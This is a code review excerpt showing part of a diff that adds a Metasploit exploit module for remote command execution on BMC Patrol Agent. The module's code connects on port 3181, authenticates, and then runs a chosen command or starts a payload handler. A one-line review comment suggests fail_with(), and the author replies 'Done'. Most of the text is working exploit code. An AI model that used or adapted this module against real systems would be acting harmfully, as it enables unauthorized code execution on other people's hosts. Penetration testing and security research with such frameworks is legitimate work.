modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb

```diff
@@ -0,0 +1,1170 @@
+        Opt::RPORT(3181),
+        OptString.new('USER',   [ true,  'local or domain user to authenticate with patrol', 'patrol' ]),
+        OptString.new('PASSWORD',   [ true,  'password to authenticate with patrol', 'password' ]),
+        OptString.new('CMD',   [ false,  'command to run on the target. If this option is specified the payload will be ignored.' ])
+      ])
+
+    end
+
+  def cleanup
+    disconnect
+    @inflater.close
+    @deflater.close
+    super
+  end
+
+  def get_target_os( srv_info_msg )
+    lines = srv_info_msg.split("\n")
+    if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}"
+      print_error("Invalid server info msg.")
+      return
+    end
+
+    os = $nil
+    ver = $nil
+    lines[2..-2].each do |i|
+      val = i.split("=")
+      if val.length == 2
+        if val[0].strip! == "T"
+          os = val[1]
+        elsif val[0].strip! == "VER"
+          ver = val[1]
+        end
+      end
+    end
+    return [os,ver]
+  end
+
+  def get_cmd_output( cmd_output_msg )
+
+    lines = cmd_output_msg.split("\n")
+    if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}"
+      print_error("Invalid command output msg.")
+      return
+    end
+
+    #Parse out command results
+    idx_start = cmd_output_msg.index("Result\x00")
+    idx_end = cmd_output_msg.index("RemPsl_user")
+    output = cmd_output_msg[idx_start+7..idx_end-1]
+
+    return output
+  end
+
+  def exploit
+
+    #Manually start the handler if not running a single command
+    if datastore['CMD'] == $nil or datastore['CMD'].empty?
+
+      #Set to nil if the cmd is empty for checks further down
+      datastore['CMD'] = $nil
+      datastore['DisablePayloadHandler'] = false
+
+      #Configure the payload handler
+      payload_instance.exploit_config = {
+        'active_timeout' => 180
+      }
+      # Set up the payload handlers
+      payload_instance.setup_handler
+
+      # Start the payload handler
+      payload_instance.start_handler
+    end
+
+    #Initialize zlib objects
+    @deflater = Zlib::Deflate.new(4, 15, Zlib::MAX_MEM_LEVEL, Zlib::DEFAULT_STRATEGY)
+    @inflater = Zlib::Inflate.new()
+
+    #Connect to the BMC Patrol Agent
+    connect
+    print_status("Connected to BMC Patrol Agent.")
+
+    #Create session msg
+    create_session
+    ret_data = receive_msg
+    if ret_data == $nil
+      print_error("Failed to receive session confirmation. Aborting.")
+      return
+    end
+    ret_len = ret_data.length
+
+    #Authenticate
+    authenticate_user(datastore['USER'], datastore['PASSWORD'])
+
+    #receive the authentication response
+    ret_data = receive_msg()
+    if ret_data == $nil
+      print_error("Failed to receive authentication response. Aborting.")
+      return
+    end
+
+    ret_msg = process_response( ret_data )
+    if ret_msg =~ /logged in/
+      print_status("Successfully authenticated user.")
+    else
+      print_error("Login failed. Aborting.")
+      return
+    end
```

Comment:
The else block could use `fail_with()` instead of `return`.

Reply:
Done